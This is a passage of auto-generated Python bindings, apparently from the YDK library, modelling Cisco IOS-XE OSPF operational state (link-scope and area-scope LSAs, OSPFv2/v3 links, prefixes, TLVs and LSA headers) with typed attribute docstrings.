name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3PrefixList(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__() self.yang_name = "ospfv3-prefix-list" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): """ OSPF multi\-topology interface augmentation .. attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value) class Tlv(Entity): """ Link TLV .. attribute:: link_type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: local_if_ipv4_addr List of local interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: local_remote_ipv4_addr List of remote interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: te_metric TE metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: max_bandwidth Maximum bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: max_reservable_bandwidth Maximum reservable bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: unreserved_bandwidth Unrseerved bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: admin_group Administrative group/Resource class/Color **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__() self.yang_name = "tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])), ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])), ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])), ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])), ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])), ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])), ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])), ]) self.link_type = None self.link_id = None self.local_if_ipv4_addr = [] self.local_remote_ipv4_addr = [] self.te_metric = None self.max_bandwidth = None self.max_reservable_bandwidth = None self.unreserved_bandwidth = None self.admin_group = None self._segment_path = lambda: "tlv" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value) class UnknownSubTlv(Entity): """ OSPFv2 Unknown sub TLV .. attribute:: type (key) TLV type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: length TLV length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: value TLV value **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__() self.yang_name = "unknown-sub-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value) class AreaScopeLsa(Entity): """ List OSPF area scope LSA databases .. attribute:: lsa_type (key) LSA Type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link Router LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv3_lsa OSPFv3 LSA **type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>` **config**\: False .. attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 